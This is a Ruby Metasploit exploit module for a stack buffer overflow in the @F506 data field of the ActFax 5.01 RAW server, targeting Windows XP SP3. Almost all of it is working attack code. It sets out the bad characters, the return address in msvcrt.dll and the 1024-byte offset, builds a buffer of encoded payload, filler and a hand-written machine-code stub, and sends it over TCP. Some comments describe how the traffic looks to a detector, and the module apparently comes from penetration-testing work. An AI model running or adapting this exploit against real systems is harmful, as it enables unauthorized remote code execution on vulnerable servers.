##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  # Module metadata only: name, description, references, payload constraints
  # and the single supported target. No network activity happens here.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ActFax 5.01 RAW Server Buffer Overflow',
        'Description' => %q{
          This module exploits a vulnerability in ActFax Server 5.01 RAW server. The RAW
          Server can be used to transfer fax messages without any underlying protocols. To
          note significant fields in the fax being transferred, like the fax number or the
          recipient, ActFax data fields can be used. This module exploits a buffer overflow
          in the handling of the @F506 fields due to the insecure usage of strcpy. This
          module has been tested successfully on ActFax 5.01 over Windows XP SP3 (English).
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Craig Freyman', # @cd1zz # discovery and Metasploit module
          'corelanc0d3r', # Metasploit module
          'juan vazquez' # Metasploit module cleanup
        ],
        'References' => [
          [ 'CVE', '2013-10064' ],
          [ 'OSVDB', '89944' ],
          [ 'BID', '57789' ],
          [ 'EDB', '24467' ],
          [ 'URL', 'http://www.pwnag3.com/2013/02/actfax-raw-server-exploit.html' ]
        ],
        'Platform' => 'win',
        'Payload' => {
          # Excluded bytes: the 0x00..0x1f control range plus 0x40 ('@'), the
          # character the RAW-server wire format uses to frame data fields
          # (see the "@F506 ... @" framing in #exploit).
          'BadChars' => (0x00..0x1f).to_a.pack("C*") + "\x40",
          'DisableNops' => true,
          # Upper bound on the encoded payload; matches 'Offset' below so the
          # payload-plus-filler block never exceeds the target offset.
          'Space' => 1024,
          'EncoderOptions' =>
          {
            # NOTE(review): presumably paired with the "mov ecx, esp" stub in
            # #exploit, which leaves ECX pointing into the sent buffer -- confirm.
            'BufferRegister' => 'ECX'
          }
        },
        'Targets' => [
          [
            'ActFax 5.01 / Windows XP SP3',
            {
              'Ret' => 0x77c35459, # push esp # ret # msvcrt.dll
              'Offset' => 1024 # bytes from the start of the field to the saved return address
            }
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2013-02-05',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Sends one RAW-server request whose @F506 data field is oversized.
  #
  # Buffer layout, in order: encoded payload, random filler up to
  # target['Offset'] bytes, the target return address, then a short
  # machine-code stub (documented inline). From a detection standpoint the
  # observable anomaly on the wire is an @F506 field of roughly 1 KiB
  # (1024 + 4 + 19 bytes here), far larger than a fax number or recipient.
  def exploit
    connect
    p = payload.encoded
    # `buffer` aliases the encoded payload string; every `<<` below appends
    # to that same object rather than to a copy.
    buffer = p
    # Filler so payload + filler == target['Offset'] bytes. 'Space' => 1024
    # in the metadata should keep p.length <= 1024, so the count is non-negative.
    buffer << rand_text(target['Offset'] - p.length)
    # 'Ret' from the selected target, packed as a 32-bit little-endian value.
    buffer << [target.ret].pack("V")
    # Stub reached after the return; see the BufferRegister note in #initialize.
    buffer << "\x89\xe1" # mov ecx, esp
    buffer << "\x81\xC1\xFC\xFB\xFF\xFF" # add ecx, -1028
    buffer << "\x81\xC4\x6C\xEE\xFF\xFF" # add esp, -4500
    buffer << "\xE9\xE9\xFB\xFF\xFF" # jmp $-1042
    print_status("Trying target #{target.name}...")
    # Wire framing: field marker, field value, closing '@', two CRLFs.
    sock.put("@F506 " + buffer + "@\r\n\r\n")
    disconnect
  end
end